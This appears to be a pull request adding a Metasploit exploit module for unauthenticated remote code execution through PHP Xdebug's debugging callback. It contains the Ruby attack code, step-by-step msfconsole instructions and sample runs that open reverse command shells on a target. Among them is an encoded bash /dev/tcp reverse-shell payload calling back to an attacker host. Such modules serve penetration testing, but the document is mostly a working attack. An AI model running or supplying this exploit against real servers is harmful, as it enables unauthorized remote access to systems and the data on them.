+    rhost = datastore["RHOST"]
+    rport = datastore["RPORT"]
+    lhost = datastore["LHOST"]
+    uri = datastore["PATH"]
+    cmd= "eval -i 1 -- "+ Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")")+"\x00"
+    print_status("Sending payload...... ")
+    vprint_line("Payload sent-#{cmd}")
+    webserv=Thread.new do
+    server=Rex::Socket::TcpServer.create(
+		    'LocalPort' => srvport,
+		    'LocalHost' => srvhost,
+		    'Context'   =>
+		           {
+			       'Msf'        => framework,
+			       'MsfExploit' => self
+			   }
+	    )
+    	client=server.accept 
+	print_status("Waiting for client response.....")
+	data=client.recv(1024)
+	print_status("Received data.....")
+    	vprint_line(data)
+	client.write(cmd)
+    	client.close
+	server.close
+	webserv.exit
+    ensure
+        webserv.exit	    
+    end
+    res=send_request_cgi({
+	    'uri' => datastore["PATH"],
+	    'method' => 'GET',
+	    'headers' => {
+		    'X-Forwarded-For' => "#{lhost}" 
+	    },
+	    'vars_get' => {
+		    'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+	    }
+    })
+end
+  end
+end  

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
         vprint_error 'Connection failed'
         return CheckCode::Unknown
       end
-      
       if res && res.headers.to_s =~ /XDEBUG/i
         vprint_good("Looks like remote server has xdebug enabled\n")
         return CheckCode::Detected


### PR DESCRIPTION
Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server via source code.
This module exploits the RCE vulnerability and gives a command shell back.

- Source: https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface

- Documentation: https://xdebug.org/docs-dbgp.php

- Tested on: Xdebug version 2.5.5

List the steps needed to make sure this thing works

-  Start `msfconsole`
-  `use exploits/unix/http/xdebug_rce`
-  `check`
-  `set RHOST 10.10.10.10` 
-   `set LHOST 10.10.14.197`
-   `exploit`

**Example Outputs**

- Check

```msf > use exploits/unix/http/xdebug_rce
msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
RHOST => 10.10.10.10
msf exploit(unix/http/xdebug_rce) > set LHOST tun0
LHOST => tun0
msf exploit(unix/http/xdebug_rce) > check

[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.10:80 The target service is running, but could not be validated.
msf exploit(unix/http/xdebug_rce) > ```



- Run


msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.10:80 - Sending payload...... 
[*] 10.10.10.10:80 - Waiting for client response.....
[*] 10.10.10.10:80 - Received data.....
[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.10:36628) at 2018-04-23 20:45:41 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

- Run verbose output

msf exploit(unix/http/xdebug_rce) > set verbose true
verbose => true
msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
Request send
Date: Mon, 23 Apr 2018 15:16:56 GMT
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Length: 314
Content-Type: text/html; charset=UTF-8


[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.10:80 - Sending payload...... 
Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
[*] 10.10.10.10:80 - Waiting for client response.....
[*] 10.10.10.10:80 - Received data.....
490<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.10:36676) at 2018-04-23 20:46:56 +0530

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)```